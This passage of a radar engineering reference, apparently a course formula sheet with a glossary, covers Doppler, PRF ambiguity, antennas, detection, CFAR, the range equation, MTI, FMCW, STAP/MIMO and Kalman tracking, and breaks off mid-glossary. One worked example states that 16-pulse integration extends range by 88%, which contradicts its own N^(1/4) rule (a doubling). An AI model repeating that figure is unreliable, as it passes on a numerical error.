The matched filter is optimal — it maximizes SNR for any given waveform. The output SNR depends only on the signal energy E and noise spectral density N₀, not on pulse shape.

SNR\_out = 2E / N₀ E = Pt · τ (pulse energy) N₀ = k\_B · T\_sys · F (noise density)

E — signal energy (J) · N₀ — noise spectral density (W/Hz)

MATCHED FILTERSNR

04 — Doppler & Velocity

Doppler Frequency Shift

A moving target compresses (approaching) or stretches (receding) the reflected wavefront, shifting the echo frequency by f\_d. Positive Doppler = closing, negative = opening.

f\_d = 2 · v\_r / λ = 2 · v\_r · f\_c / c v\_r = f\_d · λ / 2 (velocity from Doppler) v\_r = v · cos(θ) (radial component)

v\_r — radial velocity (m/s) · θ — angle from boresight

DOPPLERVELOCITY

Maximum Unambiguous Velocity

The radar samples echo phase once per PRI. The Nyquist limit for phase sampling is π per sample — a target exceeding v\_u aliased to a wrong (lower) apparent velocity. This is the Doppler counterpart of range ambiguity.

v\_u = PRF · λ / 4 Phase advance per PRI: Δφ = π · v\_r / v\_u At v\_r = v\_u: Δφ = π (Nyquist limit) Aliased velocity: v\_app = v\_r mod v\_u

v\_u — max unambiguous velocity (m/s)

VELOCITYAMBIGUITY

05 — PRF & The Range-Doppler Ambiguity

Ambiguity Product — Fixed by Physics

PRF simultaneously sets both R\_u and v\_u in opposite directions. Their product is fixed by the carrier frequency alone — independent of PRF. No single PRF can simultaneously maximize both.

R\_u · v\_u = c² / (8 · f\_c) = λ · c / 8 (in terms of wavelength) Product is CONSTANT for a given frequency.

f\_c — carrier frequency (Hz) · invariant under PRF changes

PRFAMBIGUITYFUNDAMENTAL

Staggered PRF — Resolving Ambiguities

Transmitting alternating PRFs with ratio p:q (p, q coprime) moves blind speeds and ghosted ranges. The Chinese Remainder Theorem extends unambiguous intervals to lcm(R\_u1, R\_u2) in range and lcm(v\_u1, v\_u2) in velocity.

R\_u\_stag = lcm(R\_u1, R\_u2) v\_u\_stag = lcm(v\_u1, v\_u2) Choose PRF ratio p/q where gcd(p,q) = 1

PRF1, PRF2 — staggered pulse rates · p, q — coprime integers

PRFSTAGGERED

06 — Antenna & Beam

Beamwidth

A uniformly illuminated aperture of width D produces a sinc² beam pattern. The 3 dB (half-power) beamwidth in radians is 0.886λ/D. It is always the ratio λ/D that matters — not D or λ independently.

θ\_3dB ≈ 0.886 · λ / D (radians) θ\_3dB ≈ 50.8 · λ / D (degrees) Angular resolution: δ\_az = R · θ\_3dB

D — aperture width (m) · R — range (m) · δ\_az — cross-range resolution

ANTENNABEAMWIDTH

Antenna Gain

Gain G is the ratio of peak radiated intensity to that of an isotropic radiator at the same total power. For a uniformly illuminated aperture, G is proportional to A/λ². Aperture efficiency η accounts for non-uniform illumination (typically 0.6–0.8).

G = η · 4π · A / λ² G = 4π · A\_eff / λ² (A\_eff = η·A) G\_dBi = 10·log₁₀(G)

A — physical aperture area (m²) · η — aperture efficiency · A\_eff — effective area

ANTENNAGAIN

Phased Array — Steering & Grating Lobes

A progressive phase shift φ\_n steers the main beam to angle θ\_s. Element spacing d must satisfy d ≤ λ/2 to push grating lobes outside the visible hemisphere. Violating this creates ambiguous returns at grating lobe angles.

Steering phase: φ\_n = n·2π(d/λ)·sin(θ\_s) Array factor: |AF|² = sin²(Nψ/2)/sin²(ψ/2) ψ = 2π(d/λ)(sinθ − sinθ\_s) Grating lobe: sin(θ\_g) = sin(θ\_s) ± nλ/d Condition for no grating lobe: d ≤ λ/2

BEAMFORMINGPHASED ARRAY

07 — Detection Theory

Hypothesis Testing

Every range cell is tested against two hypotheses: H₀ (noise only) vs H₁ (target + noise). The threshold T sets the trade-off between false alarm probability Pfa and detection probability Pd. No threshold can eliminate both errors simultaneously — the distributions always overlap.

H₀: p(x) = N(0, σ\_n²) \[Gaussian model] H₁: p(x) = N(A\_s, σ\_n²) Pfa = P(x &gt; T | H₀) = Q((T)/σ\_n) Pd = P(x &gt; T | H₁) = Q((T-A\_s)/σ\_n)

DETECTIONNEYMAN-PEARSON

Rayleigh/Rice Model (Envelope Detection)

Real radar receivers use envelope detection, making the noise Rayleigh-distributed (not Gaussian). The Marcum Q₁ function gives Pd for a non-fluctuating target. This is a better model for envelope-detected radar returns. The right model still depends on where in the receiver chain you place the detector and test statistic.

H₀ (noise only): Rayleigh(σ\_n) Pfa = exp(−T²/2σ\_n²) H₁ (target+noise): Rice(A\_s, σ\_n) Pd = Q₁(A\_s/σ\_n, T/σ\_n) \[Marcum Q] Swerling 1: Pd = Pfa^(1/(1+SNR))

DETECTIONRAYLEIGHSWERLING

Coherent Integration

Summing N pulses coherently (phase-aligned) improves SNR by exactly N (linear), or 10 log₁₀(N) dB. This is the fundamental lever for extending detection range without increasing transmit power.

SNR\_coh = N · SNR\_single SNR\_improvement = 10·log₁₀(N) dB Range extension ∝ N^(1/4) Example: N=16 → +12 dB → +88% range

INTEGRATIONDETECTION

08 — CFAR — Constant False Alarm Rate

CA-CFAR Threshold

Cell-Averaging CFAR estimates local noise power from N reference cells surrounding each cell under test (CUT). The threshold scales with the noise estimate, keeping Pfa constant as noise level changes. Guard cells prevent target energy from contaminating the noise estimate.

T = α · mean(reference cell powers) α = N · (Pfa^(−1/N) − 1) Guard cells: typically 2–4 each side Reference cells: typically N = 16–32

α — CFAR scaling factor · N — number of reference cells

CFARDETECTION

CFAR Variants

CA-CFAR fails at clutter edges and in target-rich environments. Variants address specific failure modes at a cost in detection performance.

CA-CFAR: mean of all reference cells GO-CFAR: max(left mean, right mean) \[clutter edges] SO-CFAR: min(left mean, right mean) \[multiple targets] OS-CFAR: k-th order statistic \[non-Rayleigh clutter]

CFARDETECTION

09 — System Parameters & Radar Range Equation

Receiver Noise Power

Thermal noise sets the absolute detection floor. The noise figure F quantifies the excess noise added by the receiver chain above the thermal minimum. The first amplifier (LNA) dominates the cascade.

P\_noise = k\_B · T\_sys · B k\_B = 1.38×10⁻²³ J/K (Boltzmann) T\_sys = T₀(F−1) + T\_ant \[system temp] T₀ = 290 K (standard reference) F\_cascade = F₁ + (F₂−1)/G₁ + ... \[Friis]

k\_B — Boltzmann constant · T\_sys — system noise temperature (K) · B — bandwidth (Hz)

NOISERECEIVER

The Radar Range Equation

The central equation of radar design. Every parameter in the RRE has been covered in the curriculum. The R⁴ dependence means doubling range requires 16× more power, or 4× more antenna gain.

SNR = (Pt · G² · λ² · σ) / ((4π)³ · R⁴ · k\_B · T\_sys · B · F · L) R\_max = \[ Pt·G²·λ²·σ / ((4π)³·SNR\_min·kTBFL) ]^(1/4) In dB: SNR\_dB = Pt\_dBW + 2G\_dBi + 20log(λ) + σ\_dBsm − 30·log(4π) − 40log(R\_m) − 10log(kTBF) − L\_dB

Pt — transmit power (W) · G — antenna gain · σ — RCS (m²) · L — losses (linear)

RANGE EQUATIONFUNDAMENTAL

Radar Cross Section (RCS)

RCS is the effective scattering area of a target — the area of an equivalent isotropic reflector producing the same power density back at the radar. Highly aspect-angle and frequency dependent.

σ = lim(R→∞) 4πR² · |E\_s|²/|E\_i|² Metallic sphere (optical): σ = πr² Flat plate (normal incidence): σ = 4πA²/λ² σ\_dBsm = 10·log₁₀(σ) \[dB sq. meters]

RCSTARGET

10 — Clutter & MTI

Clutter RCS

Ground and sea clutter are distributed targets characterized by the normalized clutter cross-section σ⁰ (sigma-naught) in dB. The total clutter RCS in one range-azimuth cell depends on the cell geometry.

σ\_c = σ⁰ · A\_c A\_c = (c·τ/2) · R · θ\_az \[range-azimuth cell] SCR = σ\_target / σ\_c \[signal-to-clutter] Typical σ⁰: farmland −25 dB, urban −10 dB

CLUTTER

MTI Canceller

Moving Target Indication subtracts consecutive pulse returns. Ground clutter (Doppler ≈ 0) cancels; moving targets survive. The improvement factor (IF) measures cancellation quality.

Single delay: y\[n] = x\[n] − x\[n−1] → H(z) = 1−z⁻¹ Double delay: y\[n] = x\[n] − 2x\[n−1] + x\[n−2] Improvement Factor: IF = SCR\_out / SCR\_in Blind speeds: v\_b = n·PRF·λ/2, n = 1, 2, 3…

MTICLUTTER

11 — FMCW Radar

Beat Frequency & Range

FMCW mixes transmit and receive signals to produce a constant beat frequency proportional to target range. A Doppler component also appears as a frequency offset between up-sweep and down-sweep measurements.

Beat frequency: f\_b = 2·R·B / (c·T) Range from beat: R = f\_b·c·T / (2·B) Range resolution: ΔR = c/(2B) Velocity: v\_r from phase difference between sweeps

B — sweep bandwidth (Hz) · T — sweep period (s) · f\_b — beat frequency

FMCWCW RADAR

12 — STAP & MIMO

STAP Optimal Weights

Space-Time Adaptive Processing jointly nulls clutter and interference in both angle and Doppler. The optimal weight vector maximizes SINR by whitening the interference covariance before steering.

w\_opt = R⁻¹·s / (s^H·R⁻¹·s) R — M×N space-time covariance matrix s — MN×1 space-time steering vector Training requirement: K ≥ 2·M·N (RMB rule)

STAPADAPTIVE

MIMO Virtual Array

MIMO radar transmits orthogonal waveforms from N\_t elements and separates them at N\_r receive elements, synthesizing N\_t×N\_r virtual channels. The virtual aperture has N\_t times the angular resolution of a conventional phased array.

Virtual elements: N\_v = N\_t × N\_r Virtual aperture: L\_v = N\_t · N\_r · d Beamwidth: θ ≈ λ / L\_v DoF gain vs phased array: N\_t times more

MIMOVIRTUAL ARRAY

13 — Target Tracking

Kalman Filter

The Kalman filter is the minimum mean-square-error estimator for linear Gaussian systems. Each cycle alternates between prediction (propagating uncertainty forward) and update (correcting with new measurement).

PREDICT: x\_{k|k-1} = F·x\_{k-1} P\_{k|k-1} = F·P·Fᵀ + Q UPDATE: y\_k = z\_k − H·x\_{k|k-1} \[innovation] S = H·P·Hᵀ + R \[innovation cov] K = P·Hᵀ·S⁻¹ \[Kalman gain] x\_k = x\_{k|k-1} + K·y\_k P\_k = (I−K·H)·P\_{k|k-1}

Q — process noise cov · R — measurement noise cov · F — state transition · H — observation matrix

TRACKINGKALMAN

Tracking Gate & Data Association

An ellipsoidal validation gate selects candidate measurements for each track. The Mahalanobis distance determines whether a measurement falls within the predicted uncertainty ellipsoid.

Gate test: d² = yᵀ·S⁻¹·y ≤ χ²\_{n,P\_g} S = H·P·Hᵀ + R \[innovation covariance] P\_g — gate probability (typically 0.95–0.999) χ²\_{n,P\_g} — chi-squared threshold (n = meas. dim.)

TRACKINGDATA ASSOCIATION

GLOSSARY

RADAR ENGINEERING TERMS — ALPHABETICAL — 57 DEFINITIONS

SEARCH TERMS

A

A-Scope

A radar display that plots received signal amplitude (vertical axis) versus range (horizontal axis). Each target appears as a spike at its corresponding range. The A-scope is the most fundamental radar display and the primary visualization in Modules 02–03.

Ambiguity Function

A 2D function χ(τ, f\_d) that describes the matched filter output for a waveform as a function of both delay (range) and Doppler offset (velocity). The ambiguity function fully characterizes the range-Doppler resolution and sidelobe structure of any waveform — an ideal thumbtack (narrow spike at the origin) is the design goal.

|χ(τ,f\_d)|² = |∫s(t)·s\*(t−τ)·e^(j2πf\_d·t)dt|²

Antenna Aperture

The physical collecting area of an antenna, measured in m². Larger aperture means higher gain and narrower beamwidth for a given wavelength. The effective aperture A\_eff = η·A accounts for illumination taper and feed losses. The relationship G = 4πA\_eff/λ² connects aperture directly to gain.

G = 4π · A\_eff / λ²

Atmospheric Attenuation

The absorption and scattering of radar energy by atmospheric gases, primarily water vapor (H₂O) and oxygen (O₂). Expressed in dB/km, it varies strongly with frequency. At X-band (~10 GHz) attenuation is ~0.01 dB/km; at 60 GHz it reaches 15 dB/km due to oxygen absorption. Both one-way and two-way losses must be budgeted in the Radar Range Equation.

B

Bandwidth

The range of frequencies occupied by a radar signal. For a simple pulse, bandwidth ≈ 1/τ. For a chirp, bandwidth B is the frequency sweep extent and directly sets compressed range resolution ΔR = c/(2B). Wider bandwidth gives finer resolution but requires wider receiver filters (more noise). Bandwidth also sets the noise power floor: P\_noise = k\_B·T·B.

ΔR = c / (2B) P\_noise = k\_B·T·B

Beamforming

The process of combining signals from multiple antenna elements with appropriate phase shifts (and optionally amplitude weights) to produce a directional beam. Beamforming can be implemented in hardware (analog beamforming), digitally after ADC (digital beamforming), or in hybrid architectures. Digital beamforming enables simultaneous multiple beams from the same array.

Beamwidth

The angular width of the main beam of an antenna pattern, typically measured between the half-power (−3 dB) points. For a uniformly illuminated rectangular aperture: θ\_3dB ≈ 0.886λ/D radians. Narrower beamwidth means better angular resolution but requires a larger aperture or higher frequency. The first sidelobe level for a uniform aperture is −13.2 dB below the main lobe peak.

θ\_3dB ≈ 0.886 λ/D (rad) ≈ 50.8 λ/D (deg)

Blind Speed

A target radial velocity at which the MTI canceller erroneously cancels the moving target along with stationary clutter. Blind speeds occur when the target's phase change per PRI is a multiple of 2π, making it appear stationary. The first blind speed is v\_b = PRF·λ/2. Staggered PRF moves blind speeds to different velocities, effectively eliminating most of them in practice.

v\_blind = n · PRF · λ/2, n = 1, 2, 3…

Burn-through Range

The maximum range at which a target's true echo exceeds the jamming noise level, allowing detection despite active noise jamming. Below burn-through range, the radar can detect the target; beyond it, jamming dominates. Lower RCS targets have shorter burn-through ranges. Increasing transmit power, coherent integration, or sidelobe cancellation all extend burn-through range.

C

CA-CFAR Cell-Averaging Constant False Alarm Rate

The most widely used CFAR algorithm. For each range cell under test, it averages the power in N surrounding reference cells and multiplies by a threshold factor α. The threshold rises where noise is high and drops where it is quiet, keeping Pfa constant regardless of noise level. Guard cells adjacent to the CUT prevent the target's own energy from inflating the noise estimate.

T = α · mean(ref cells) α = N·(Pfa^(−1/N) − 1)

CFAR Constant False Alarm Rate

A class of detection algorithms that maintain a constant Pfa regardless of changes in background noise or clutter level, by adaptively setting the detection threshold based on the local environment. The alternative — a fixed threshold — has a Pfa that varies wildly with noise level, producing either excessive false alarms in high-noise regions or missed detections in quiet regions.

Chirp

See [LFM Chirp](). A waveform whose instantaneous frequency sweeps linearly from f₀ to f₀+B over the pulse duration T. Used in pulse compression to achieve fine range resolution (∝ 1/B) while transmitting a long high-energy pulse (∝ T).

Clutter

Any unwanted radar return that is not the target of interest. Ground clutter (land and sea returns), weather clutter (rain, hail), chaff, and birds all produce clutter. Unlike thermal noise (spectrally flat), clutter has spatial and Doppler structure that radar signal processing can exploit. The signal-to-clutter ratio (SCR) determines detectability in clutter-limited environments.

Coherent Integration

The process of summing multiple pulse returns with phase alignment before detection. Because the target signal adds coherently (amplitudes add) while noise adds incoherently (power adds), coherent integration of N pulses improves SNR by N linear (10 log₁₀ N dB). This is fundamentally different from incoherent integration (√N gain in amplitude) and is the primary tool for extending detection range.

SNR\_coh = N · SNR\_single

D

Data Association

The problem of determining which radar measurements belong to which tracked targets. In multi-target environments, measurements from different targets can fall within each other's tracking gates, creating ambiguous correspondence. Algorithms range from Nearest Neighbor (simple, brittle) to JPDA (probabilistic, polynomial) to MHT (optimal, exponential worst-case). Correct association is prerequisite to accurate track maintenance.

Detection Probability Pd

The probability that the radar correctly declares a target present when one actually exists. Pd depends on SNR and the detection threshold T: higher SNR means the target distribution is better separated from the noise distribution. For a given SNR, raising the threshold reduces both Pd (more misses) and Pfa (fewer false alarms). The ROC curve traces all Pd–Pfa pairs for a given SNR.

Pd = P(X &gt; T | H₁) Swerling 1: Pd = Pfa^(1/(1+SNR))

Doppler Effect

The apparent change in frequency of a wave caused by relative motion between source and observer. For radar, a target moving radially at velocity v\_r shifts the echo frequency by f\_d = 2v\_r/λ — positive (upshift) if closing, negative (downshift) if opening. The factor of 2 arises from the round-trip: the radar "hears" the shift on both transmission and reception.

f\_d = 2·v\_r/λ = 2·v\_r·f\_c/c

DRFM Digital Radio Frequency Memory

An electronic warfare device that captures a radar's transmitted waveform digitally, stores it, and retransmits it with controlled modifications (delay, Doppler shift, amplitude changes). DRFM enables sophisticated deception jamming: false targets at controlled ranges and velocities, range-gate pull-off, velocity gate pull-off, and so on. Modern DRFMs operate with GHz bandwidth and nanosecond timing precision.

Duty Cycle

The fraction of time the radar is transmitting: DC = τ · PRF = τ / PRI. High duty cycle means more average power (better SNR) but less time available to receive echoes (reduced range). CW and FMCW radars have duty cycle = 1 (100%), requiring transmit/receive isolation by physical separation or polarization. Pulsed radars typically have duty cycles of 1–10%.

DC = τ · PRF = Pt\_avg / Pt\_peak

E

Electronic Warfare EW

All military and security applications of the electromagnetic spectrum for attack, defense, and support. Electronic Attack (EA) includes jamming, deception, and directed energy. Electronic Protection (EP) includes ECCM techniques like frequency agility, sidelobe blanking, LPI waveforms, and spatial nulling. Electronic Support (ES) is passive interception and signals intelligence. Radar and EW systems are in continuous technological competition.

F

False Alarm Pfa

A detection event where the radar declares a target present when no target exists — noise or clutter exceeds the threshold. Expressed as a probability Pfa = P(noise &gt; T). Even Pfa = 10⁻⁶ (one in a million) generates thousands of false alarms per second at typical radar PRFs (10 kHz PRF × 1000 range bins = 10⁷ tests/second). CFAR keeps Pfa constant; a fixed threshold does not.

Pfa = exp(−T²/2σ\_n²) \[Rayleigh noise]

FMCW Frequency-Modulated Continuous Wave

A radar architecture that transmits a continuous frequency sweep while simultaneously receiving. Mixing transmit and receive signals produces a "beat" frequency directly proportional to target range. FMCW has no minimum range (no T/R switching delay), low peak power (excellent for LPI), compact hardware integration, and simultaneous range-velocity measurement. It is the standard architecture for automotive radar (77 GHz), drone altitude sensors, and industrial level gauges.

f\_beat = 2·R·B/(c·T) ΔR = c/(2B)

Frequency Agility

Changing the radar's carrier frequency pseudo-randomly from pulse to pulse across a wide band. Agility provides: (1) ECCM — spot jammers must spread power across the entire band, reducing J/S; (2) RCS decorrelation — independent scintillation samples improve detection of Swerling 1/2 targets; (3) range sidelobe reduction in synthetic aperture processing. The frequency hop band must be wider than the coherent processing bandwidth.

G

Gain (Antenna) G

The ratio of the antenna's peak radiated power density (in its direction of maximum radiation) to that of a lossless isotropic radiator fed with the same total power. Gain is dimensionless but typically expressed in dBi (dB relative to isotropic). Gain appears as G² in the monostatic Radar Range Equation — once for transmit focusing, once for receive collecting area. A 2× aperture area increase gives +3 dBi gain, which improves maximum detection range by ×2^(1/4) ≈ 19%.

G = η·4πA/λ² (aperture antenna) G\_dBi = 10·log₁₀(G)

Grating Lobe

Secondary maxima in a phased array beam pattern that appear at the same gain as the main lobe when element spacing d &gt; λ/2. A target at a grating lobe angle is completely indistinguishable from a main-beam target, producing a catastrophic ambiguity. All practical phased arrays use d ≤ λ/2 to push grating lobes to sin(θ) &gt; 1 (outside the visible hemisphere). Widening element spacing to reduce cost or increase bandwidth must be traded against grating lobe appearance.

sin(θ\_g) = sin(θ\_s) ± n·λ/d, n=1,2,3… No grating lobes when: d ≤ λ/2

H

Hypothesis Testing H₀ / H₁

The statistical framework underlying all radar detection. H₀ (null hypothesis) = no target present; H₁ (alternative) = target present. The Neyman-Pearson lemma proves that the likelihood ratio test is optimal: it maximizes Pd for a given Pfa. In practice the exact likelihood ratio requires knowledge of the target amplitude distribution, which drives the choice of Swerling model and CFAR variant.

I

Improvement Factor IF

For MTI processors, the improvement factor (also called clutter improvement factor or CIF) is the ratio of signal-to-clutter ratio at the output to that at the input, expressed in dB. A single-delay MTI canceller achieves 30–40 dB IF on ideal stationary clutter. IF is degraded by clutter spectral width (wind-induced motion, antenna scanning, platform motion), receiver phase noise, and A/D quantization errors.

IF = SCR\_out / SCR\_in (linear) IF\_dB = SCR\_out\_dB − SCR\_in\_dB

J

J/S Ratio Jamming-to-Signal Ratio

The ratio of jamming power to target echo power at the radar receiver. A self-screening jammer (on the target aircraft) sees the signal power fall as 1/R⁴ (two-way propagation) while jamming power falls only as 1/R² (one-way propagation). At long range the jammer wins; at short range (burn-through range) the echo dominates. Stand-off jammers (separate platform) see different geometry.

J/S = (Pj·Gj·R²) / (Pt·G²·σ/(4π)·R²\_j) Self-screen: J/S ∝ R² (jammer gains at range)

K

Kalman Filter

A recursive algorithm for optimal state estimation in linear systems with Gaussian noise. Each cycle alternates between prediction (propagating the state estimate and uncertainty forward using the motion model) and measurement update (correcting the prediction using new observations via the Kalman gain). The Kalman gain automatically weights prediction vs measurement based on their respective uncertainties — optimal in the MMSE sense for linear Gaussian systems.

K = P·Hᵀ·(H·P·Hᵀ+R)⁻¹ x←x+K·(z−Hx)

L

LFM Chirp Linear Frequency Modulation

A pulse waveform whose instantaneous frequency sweeps linearly from f₀ to f₀+B over the pulse duration T. The matched filter for an LFM chirp produces a compressed output with width ≈ 1/B — achieving fine resolution independent of pulse length. The time-bandwidth product BT is the pulse compression gain (typically 100–10,000 in modern systems). LFM is the most widely used pulse compression waveform due to its Doppler tolerance and ease of implementation.

ΔR = c/(2B) G\_c = B·T

LPI Low Probability of Intercept

A design philosophy and set of waveform/system techniques that minimize the likelihood of an adversary's electronic support (ES) receiver detecting the radar's transmissions. LPI techniques include: FMCW (low peak power), frequency agility (spread signal across wide band), burst mode operation, low sidelobes, and high antenna directivity. LPI radar sacrifices range or revisit rate to reduce detectability.

M

Matched Filter

A linear filter whose impulse response is the time-reversed complex conjugate of the transmitted waveform. The matched filter maximizes the output SNR for any given waveform and is provably optimal under the Neyman-Pearson criterion. Its output is the cross-correlation of the received signal with the transmitted template; peaks in the output correspond to target ranges. The width of the peak equals the inverse signal bandwidth — which is why range resolution equals c/(2B).

h(t) = s\*(T−t) SNR\_out = 2E/N₀

MIMO Radar Multiple-Input, Multiple-Output

A radar architecture that transmits orthogonal waveforms from multiple antennas simultaneously. Each receive element separates the orthogonal transmit waveforms using matched filters, creating N\_t×N\_r virtual receive channels. The resulting virtual aperture has N\_t times more elements than a conventional phased array of the same physical size, providing superior angular resolution and degrees of freedom for STAP and parameter estimation.

Virtual DoF = N\_t × N\_r

MTI Moving Target Indication

A signal processing technique that cancels stationary clutter by subtracting consecutive pulse returns. The clutter, nearly identical between pulses, cancels; moving targets change phase each PRI and survive. Single-delay MTI uses H(z)=1−z⁻¹ (notch at DC); double-delay MTI deepens the notch. MTI is the simplest form of Doppler processing and is the predecessor to modern pulse-Doppler and STAP processors.

y\[n] = x\[n] − x\[n−1] → H(e^jω) = 1 − e^{−jω}

N

Noise Figure F or NF

A measure of the excess noise added by a receiver component or chain above the thermal noise floor. Defined as F = SNR\_in / SNR\_out (linear). A perfect noiseless receiver has F = 1 (0 dB). Real LNAs achieve 0.5–3 dB; system noise figures of 3–10 dB are common. The Friis cascade formula shows that the first element (LNA) contributes most: cooling or improving it gives the largest system benefit.

F\_total = F₁ + (F₂−1)/G₁ + (F₃−1)/(G₁G₂) + …

O

Off-Boresight Angle

The angular separation between the radar's boresight (main beam axis) and the direction to a target of interest. Antenna gain falls off as the off-boresight angle increases, following the one-way pattern G(θ). At the 3 dB beamwidth (θ₃dB/2 off boresight), gain drops by 3 dB one-way (6 dB two-way), reducing SNR significantly. Targets at large off-boresight angles may be seen only through sidelobes.

G(θ) ≈ G₀ · sinc²(πDsinθ/λ) (uniform aperture)

Operating Frequency f₀, λ

The carrier frequency at which a radar transmits. Operating frequency determines wavelength (λ = c/f₀), which in turn affects range resolution, Doppler sensitivity, antenna size, and atmospheric propagation losses. Common radar bands: L-band (1–2 GHz, long-range surveillance), S-band (2–4 GHz, weather/ATC), C-band (4–8 GHz, weather), X-band (8–12 GHz, fire control/imaging), Ka-band (27–40 GHz, automotive).

λ = c / f₀ (c ≈ 3×10⁸ m/s)

P

Phased Array

An antenna array in which the phase (and optionally amplitude) of the signal applied to each element is individually controlled to steer and shape the beam electronically, without mechanical movement. Phase steering can redirect the beam in microseconds — versus tens of milliseconds for mechanically scanned antennas. Phased arrays enable simultaneous multiple beams, adaptive nulling, and rapid interleaving of different radar modes.

PPI Scope Plan Position Indicator

A radar display that presents a top-down (azimuth vs range) 2D map of the surveillance area. The radar antenna rotates (or the beam scans electronically), and each range-azimuth cell is mapped to a pixel. Targets appear as bright spots at their true geographic positions. PPI is the standard display for air traffic control, weather radar, and naval surveillance systems.

PRF Pulse Repetition Frequency

The number of pulses transmitted per second (Hz). PRF simultaneously sets maximum unambiguous range (R\_u = c/2PRF) and maximum unambiguous velocity (v\_u = PRF·λ/4) in opposite directions — increasing PRF extends velocity coverage but reduces range coverage. The PRF ambiguity product R\_u·v\_u = c²/(8f\_c) is fixed by physics. Three PRF regimes: low PRF (range unambiguous), medium PRF (both ambiguous), high PRF (velocity unambiguous).

R\_u = c/(2·PRF) v\_u = PRF·λ/4

Pulse Compression

A waveform processing technique that transmits a long coded pulse (for energy) but achieves the range resolution of a short pulse (for resolution). The most common form uses an LFM chirp; phase-coded waveforms (Barker, Frank codes) are also used. The time-bandwidth product B·T is the compression gain: the ratio of compressed to uncompressed pulse width. Pulse compression decouples the energy–resolution trade-off that limits simple pulsed radars.

G\_c = B·T ΔR = c/(2B) (compressed)

Q

Quadrature Sampling I/Q

A signal representation using two components sampled in phase quadrature (90° apart): In-phase (I) and Quadrature (Q). Together they form a complex-valued signal s(t) = I(t) + jQ(t) that preserves both amplitude and phase of the radar return. I/Q sampling enables coherent processing, Doppler estimation, and unambiguous phase measurement. Modern radars digitize I and Q directly at IF or use digital downconversion from RF samples.

s(t) = I(t) + jQ(t) A = √(I²+Q²) φ = atan2(Q,I)

R

Radar Cross Section RCS, σ

The effective scattering area of a target, defined as the area of an equivalent perfectly reflecting isotropic sphere that would return the same power to the radar. RCS depends on target shape, size, material, orientation (aspect angle), and radar frequency. Typical values: aircraft 1–10 m² (0–10 dBsm), stealth aircraft ~0.001 m² (−30 dBsm), ship 1,000–100,000 m² (30–50 dBsm). A 10 dB reduction in RCS cuts maximum detection range by ~44%.

σ\_dBsm = 10·log₁₀(σ) sphere: σ = πr²

Radar Range Equation RRE

The fundamental equation relating radar detection range to system parameters. It expresses the received SNR as a function of transmit power, antenna gain, wavelength, RCS, range, and noise. The R⁴ dependence (two-way propagation squared) is the central challenge of long-range radar — doubling range requires 16× more power or 4× more antenna area. All Phase I–II modules build toward this single equation.

SNR = Pt·G²·λ²·σ / ((4π)³·R⁴·kTBFL)

ROC Curve Receiver Operating Characteristic

A plot of detection probability Pd versus false alarm probability Pfa for all possible threshold values at a given SNR. Every point on the curve represents a different threshold setting. Higher SNR shifts the ROC curve up and to the left (better performance). The ideal ROC curve passes through (Pfa=0, Pd=1) — a perfect detector. The area under the ROC curve (AUC) is a single-number performance metric.

S

SAR Synthetic Aperture Radar

A radar imaging technique that exploits the motion of the platform (aircraft, satellite) to synthesize a virtual aperture far larger than the physical antenna. By coherently processing echoes collected over a long along-track distance L\_s, SAR achieves cross-range resolution δ\_cr ≈ D/2 — independent of range and wavelength. SAR enables centimeter-resolution imaging from low Earth orbit and is used for terrain mapping, change detection, and reconnaissance.

δ\_cr ≈ D/2 (focused SAR, D = physical aperture)

Sidelobes

Secondary maxima of the antenna beam pattern or matched filter output that appear outside the main lobe. Antenna sidelobes allow targets or jammers at off-boresight angles to produce returns that appear to come from the main beam direction. Matched filter range sidelobes create false peaks around a real target. Both are controlled by window functions (tapering) at a cost in main lobe width. The first sidelobe of a uniform aperture/rectangle window is −13.2 dB; Hamming gives −42.7 dB.

SNR Signal-to-Noise Ratio

The ratio of target signal power to noise power at the detector input, expressed linearly or in dB. SNR is the primary determinant of detection performance: higher SNR means better separation of the target and noise distributions, enabling either higher Pd at a given Pfa, or the same Pd at lower Pfa. The SNR required for a given (Pd, Pfa) pair is the detection threshold and is read from ROC curves or Albersheim's equation.

SNR\_dB = 10·log₁₀(P\_signal / P\_noise)

Staggered PRF

A technique using two or more alternating pulse repetition frequencies with incommensurate ratios to extend the unambiguous range and velocity coverage beyond what any single PRF can achieve. Based on the Chinese Remainder Theorem: the extended unambiguous intervals are the least common multiples of the individual intervals. Staggered PRF also moves MTI blind speeds — a target visible at one PRF is likely visible at the other.

STAP Space-Time Adaptive Processing

An adaptive signal processing technique that simultaneously exploits spatial (array element) and temporal (pulse) degrees of freedom to cancel interference. For an airborne radar, STAP places a 2D null in angle-Doppler space along the clutter ridge (where ground clutter appears at all Doppler shifts proportional to platform velocity × angle cosine). STAP generalizes both beamforming (spatial only) and MTI (temporal only) into a unified framework.

w\_opt = R⁻¹·s / (sᴴ·R⁻¹·s)

Swerling Models

A set of four statistical models (Sw0–Sw4) describing how target RCS fluctuates over time. Sw0: non-fluctuating (steady RCS). Sw1: exponential RCS distribution, scan-to-scan decorrelation (multiple glints — aircraft body). Sw2: exponential, pulse-to-pulse decorrelation. Sw3: chi-squared 4 DoF, scan-to-scan (dominant scatterer). Sw4: chi-squared 4 DoF, pulse-to-pulse. Fluctuating targets (Sw1–4) require more SNR than non-fluctuating for Pd &gt; 0.5 — the diversity loss.

Sw1: Pd = Pfa^(1/(1+SNR\_avg))

System Losses L

All signal power losses that reduce the received SNR below what the Radar Range Equation would predict for an ideal system. Includes: feed and transmission line losses, antenna pointing loss, signal processing losses (range and Doppler straddle losses), A/D quantization loss, matched filter mismatch, propagation losses (rain, atmospheric), and system integration losses. Typically 3–10 dB total. Must be measured and budgeted for each specific system design.

T

Thermal Noise

Random electrical noise generated by the thermal agitation of electrons in any resistive component above absolute zero. It is irreducible — the fundamental detection floor for every radar. The available noise power from a resistor at temperature T over bandwidth B is P = k\_B·T·B. At 290 K and 1 MHz bandwidth, this is −114 dBm. Reducing system temperature (cooling the LNA), narrowing bandwidth, or narrowing the noise figure are the only ways to lower the floor.

P\_noise = k\_B · T · B k\_B = 1.38×10⁻²³ J/K

Tracking Gate Validation Gate

An ellipsoidal region in measurement space centered on a track's predicted position, used to determine which measurements could plausibly have originated from that track. Measurements falling inside the gate are candidates for association; those outside are rejected. The gate size is set by the innovation covariance S and a chi-squared threshold corresponding to the desired gate probability P\_g. Small gates reduce false association but risk missing the true measurement when prediction is imprecise.

d² = yᵀ·S⁻¹·y ≤ χ²\_{n,Pg}

U

Unambiguous Range R\_u

